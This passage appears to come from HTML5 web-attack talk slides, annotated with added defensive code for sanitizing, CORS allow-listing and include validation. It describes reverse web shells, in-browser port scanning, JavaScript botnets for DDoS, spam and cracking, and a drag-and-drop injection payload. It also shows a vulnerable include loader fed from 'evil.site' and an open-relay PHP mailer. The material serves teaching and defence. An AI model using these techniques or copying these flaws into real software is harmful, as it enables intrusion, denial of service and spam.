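    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch {
    return false;
  }
}

// Rebuilds one start tag keeping only allow-listed attributes; returns null when
// the element itself is not allowed. Limitation: does not handle ">" inside a
// quoted value; a real filter should work on a parsed DOM rather than tag text.
function sanitizeStartTag(tag) {
  const m = /^<\s*([a-zA-Z][\w-]*)([^>]*)>$/.exec(tag.trim());
  if (!m) return null;
  const name = m[1].toLowerCase();
  if (!(name in ALLOWED)) return null;
  const kept = [];
  const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let a;
  while ((a = attrRe.exec(m[2])) !== null) {
    const attrName = a[1].toLowerCase();
    const attrValue = a[2] ?? a[3] ?? a[4] ?? '';
    if (!ALLOWED[name].has(attrName)) continue;              // not on the list: dropped
    if (URL_ATTRS.has(attrName) && !safeUrl(attrValue)) continue; // bad scheme: dropped
    kept.push(`${attrName}="${attrValue.replace(/"/g, '&quot;')}"`);
  }
  return `<${name}${kept.length ? ' ' + kept.join(' ') : ''}>`;
}
```

The contrast is the point of slides 10 to 14: the black-list knows `onforminput=` only because someone added it, and `formaction=` slips through, whereas the allow-list never needed to know either name.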
18. Cross Origin Request (COR)
• Originally Ajax calls were subject to Same Origin Policy
• Site A cannot make XMLHttpRequests to Site B
• HTML5 makes it possible to make these cross domain calls
• Site A can now make XMLHttpRequests to Site B as long as Site B allows it.
• Response from Site B should include a header:
Access-Control-Allow-Origin: Site A
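What "as long as Site B allows it" looks like on the server side, as an added example that is not part of the slides: `corsHeadersFor` computes the Access-Control-Allow-Origin header from a fixed allow-list of origins, and sits beside `reflectAnyOrigin`, the shortcut that echoes whatever Origin the request carries and therefore lets every site on the web read the response. The origins in `ALLOWED_ORIGINS` are constructed for illustration.

```javascript
// Added example (constructed; not from the slides): deciding the
// Access-Control-Allow-Origin header on the Site B side.
const ALLOWED_ORIGINS = new Set([
  'https://site-a.example',
  'https://app.site-a.example',
]);

// The shortcut that defeats the purpose: echo whatever Origin the request
// carries. Any site can then read Site B's responses from its visitors' browsers.
function reflectAnyOrigin(originHeader) {
  return { 'Access-Control-Allow-Origin': originHeader };
}

// Allow-list version. Returns the headers to add, or {} when the origin is not
// trusted; without the header the browser hides the response from the calling
// script. The Origin value is parsed and re-serialised so only an exact
// scheme://host[:port] match is accepted (no prefix or substring matching).
function corsHeadersFor(originHeader) {
  if (typeof originHeader !== 'string') return {};
  let normalised;
  try {
    normalised = new URL(originHeader).origin;
  } catch {
    return {};           // not a URL, e.g. the literal string "null"
  }
  if (normalised !== originHeader || !ALLOWED_ORIGINS.has(normalised)) return {};
  return {
    'Access-Control-Allow-Origin': normalised,
    'Vary': 'Origin',    // keep caches from serving this response to another origin
  };
}
```

In a Node `http` handler the result is merged into the response headers, `Object.assign(headers, corsHeadersFor(req.headers.origin))`. Exact matching matters more once `Access-Control-Allow-Credentials: true` is added, because then the allowed origin can read responses carrying the victim's cookies.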
19. Reverse Web Shell
• This feature can be abused to set up a Reverse Web Shell
• Say vuln.site is vulnerable to XSS and an attacker injects his payload in the victim's browser
• This payload can now make cross domain calls to attacker.site and read the response
• This sets up a communication channel between the attacker and victim
• Attacker can access vuln.site from victim's browser by using this channel
21. Shell of the Future
• Tool to automate the process of creating and accessing a Reverse Web Shell
• Tunnels the attacker's HTTP traffic over COR from the victim's browser
• Attacker can browse the victim's session from his browser.
• Can get around Session Hijacking countermeasures like HttpOnly and IP Address-Session ID binding
• Comes loaded with two default JavaScript exploits
• Supports HTTPS websites as well
25. Text-field Injection using Drag and Drop API
• Filling forms across domains is usually difficult in Clickjacking attacks
• HTML5's Drag and Drop API makes this easy
• Attacker convinces the victim to perform a Drag and Drop operation
• A simple game can be convincing here
• By using frame overlays, this action can fill forms across domains
• Introduced by Paul Stone at BlackHat Europe 2010
26. How it works
• Attacker.site would contain an element like this:
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil data')"><h3>DRAG ME!!</h3></div>
• When the victim starts dragging this, the event's data value is set to 'Evil data'
• Victim drops the element onto a text field inside an invisible iframe
• That field is populated with the value 'Evil data'.
33. Client-side File Includes
• Have you seen URLs like these:
http://www.example.com/#index.php
• Inside the page:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function(){if(x.readyState==4){
document.getElementById("main").innerHTML=x.responseText;}}
x.send();
</script>
<div id="main"></div>
</body></html>
34. The Cross Origin Request effect
• This design, though flawed, was difficult to exploit earlier
• Introducing Cross Origin Requests
http://example.com/#http://evil.site/payload.php
• Contents of 'payload.php' will be included as HTML within <div id="main"></div>
• New type of XSS!!
• Discovered by Matt Austin on touch.facebook.com and a bunch of other sites
35. XMLHttpRequest as a sink
• COR makes XMLHttpRequest a dangerous DOM-based XSS sink
• Responses of XHR are consumed in many websites in different ways.
Eg: JSON, XML, HTML
• Since this data is supposed to be from the same domain it is usually not validated
• Huge potential for XSS vulnerabilities
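Slides 33 to 35 describe one sink: whatever follows `#` goes straight into `x.open(...)`, and the response straight into `innerHTML`. The added example below, which is not code from the slides, is the check the page should run before opening the request. `resolveInclude` parses the fragment against the page's own origin so that `http://evil.site/...`, protocol-relative `//evil.site/...` and `javascript:` targets are refused, and only paths on a known list are fetched; `loadInclude` shows the slide's loader using it. `PAGE_ORIGIN` and the `INCLUDABLE` paths are constructed for illustration. This does not by itself make the response safe to assign to `innerHTML`: a same-origin fragment that echoes user input is still an XSS, so treat the response as data (`textContent`) or sanitize it.

```javascript
// Added example (constructed; not from the slides): validating the fragment
// before the page on slide 33 hands it to XMLHttpRequest.
const PAGE_ORIGIN = 'https://www.example.com';            // the including page's origin
const INCLUDABLE = new Set(['/index.php', '/about.php']);  // the only fragments the page may load

// Returns the absolute same-origin URL to request, or null to refuse.
function resolveInclude(hash, pageOrigin = PAGE_ORIGIN) {
  if (typeof hash !== 'string' || hash.length < 2 || hash[0] !== '#') return null;
  const candidate = hash.slice(1);
  let url;
  try {
    // Relative paths resolve against the page; absolute or protocol-relative
    // targets keep their own origin and fail the comparison below.
    url = new URL(candidate, pageOrigin + '/');
  } catch {
    return null;
  }
  if (url.origin !== pageOrigin) return null;      // http://evil.site/..., //evil.site/..., javascript:
  if (!INCLUDABLE.has(url.pathname)) return null;  // unknown or traversed path
  url.search = '';                                 // nothing attacker-chosen reaches the server
  url.hash = '';
  return url.href;
}

// The slide's loader with the check in front of it. The XHR object is passed
// in so the function can be exercised outside a browser; onText receives the
// response body, which the caller must still treat as untrusted.
function loadInclude(xhr, hash, onText) {
  const target = resolveInclude(hash);
  if (target === null) return false;
  xhr.open('GET', target);
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) onText(xhr.responseText);
  };
  xhr.send();
  return true;
}
```

Because the check is a positive list of paths rather than a ban on `http://`, the bypasses that a black-list invites (`//evil.site`, `https://www.example.com@evil.site/`, mixed-case schemes) all end up as a different `origin` and are refused for the same reason.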
40. Port Scanning
• COR and WebSockets can be used for performing reliable port scans
• The time it takes to change its readyState status indicates the status of the port it is connecting to
– XHR depends on time spent in ReadyState 1
– WebSockets depends on time spent in ReadyState 0
• Possible to identify open, closed and filtered ports
• Scans are subject to the port blocking employed in all popular browsers
41. Application-level scanning
• These are application-level not socket-level scans
• The port behavior would depend on the application running on it. Types of applications:
– Close on connect: Application terminates the connection once connection is established due to protocol mismatch.
– Respond & close on connect: Similar to type-1 but sends some default response before closing connection
– Open with no response: Application keeps the connection open expecting more data or data that would match its protocol specification.
– Open with response: Similar to type-3 but sends some default response on connection, like a banner or welcome message
43. Network Scanning
• Use the port scanning technique to perform horizontal scans of the network
• Fact that we can detect closed ports makes this ideal
• Scan for port 445, it is usually allowed through personal firewalls
– Windows 7: application type-1, easily detected
– Windows XP: application type-3, cannot be detected
• Port 3389 is also usually allowed across firewalls, but it can only be detected if this port is closed on the system (when open it behaves as application type-3)
44. Guessing user's Private IP
• Step 1: Identify the user's subnet
– Most home users are on the 192.168.x.x subnet and the router is 192.168.x.1
– Scanning for port 80 from 192.168.0.1 to 192.168.255.1 identifies the user's subnet
• Step 2: Identify the user's IP address
– Scan the subnet for a port filtered by personal firewalls - Eg: 601337
– The only system that would respond is the user's system, the request does not get filtered by the firewall as it was generated within the same machine
45. JSRecon
• It's an online tool to perform port and network scans
• Uses the techniques discussed earlier
• http://www.andlabs.org/tools/jsrecon.html
• DEMO
48. Why JavaScript?
• Botnets are the attacker's version of distributed computing, made of a large number of nodes executing the attacker's code
• JavaScript is the easiest form of code to execute in anybody's system
• We all execute thousands of lines of untrusted JavaScript code in our browsers every day during our casual browsing sessions
• Platform & OS neutral - One language to rule them all
• Billions of potential nodes (web users)
50. Reaching out to victims
• Email spam
• Trending topics on Twitter
• Persistent XSS on popular websites, forums etc
• Search Engine Poisoning
• Compromised websites
"The sole cause of all human misery is the inability of people to sit quietly in their rooms" - Blaise Pascal
"The sole cause of all browser attacks is the inability of people to leave a link unclicked" - Internet version
53. DDoS Attacks
• Application-level DDoS can bring down even huge sites
• Pick a process intensive request and make it a few thousand times
Eg: http://target.site.com/search.php?product=%
• HTML5's COR can make GET requests to any website
• I clocked 10,000 COR requests/minute on my laptop
• 600 nodes = 100,000 requests/sec - site DoSed?
• 6000 nodes?? 60000 nodes???
54. Email Spam
• Primarily sent using open relay mail servers
• Web equivalent of open relay mail servers:
http://example.com/feedback.html
<form method="GET" action="feedback.php">
<input type="hidden" name="to" value="fb@example.com" />
From: <input type="text" name="from" value=""/>
Subject: <input type="text" name="subject" value=""/>
Comment: <input type="text" name="comment" value=""/></form>
http://example.com/feedback.php
<?php mail($_GET['to'], $_GET['subject'], $_GET['comment'], "From: " . $_GET['from']); ?>
55. Spam through COR
• If the form is submitted over GET then COR has no problems
• If the form is submitted over POST then it is not possible
• JSP applications can still be affected using HTTP Parameter Pollution
• This attack is possible even without COR
<img src="http://example.com/feedback.php?....">
• But COR is the only option from within WebWorkers
56. Distributed Password Cracking
• JavaScript is generally not considered to be a good platform for password cracking
• But JavaScript engines are becoming faster every day
• How fast? - it was possible to create 100000 MD5 hashes/second in JavaScript on an i5, 4GB system
• This is still 100-115 times slower than native code's performance on the same machine
• ~110 nodes running JS code == 1 running native code
• What JavaScript lacks in performance, it more than makes up in volume
57. Ravan - Distributed JS Computing System
• System for legitimate use of password cracking with JavaScript
• Users are asked for permission before starting the cracking process in their browser
• Divides the cracking process into slots and allots them to individual workers
• The entire process is managed by the master, the hash submitter's browser
• Supports Salted MD5 and SHA hashes
• DEMO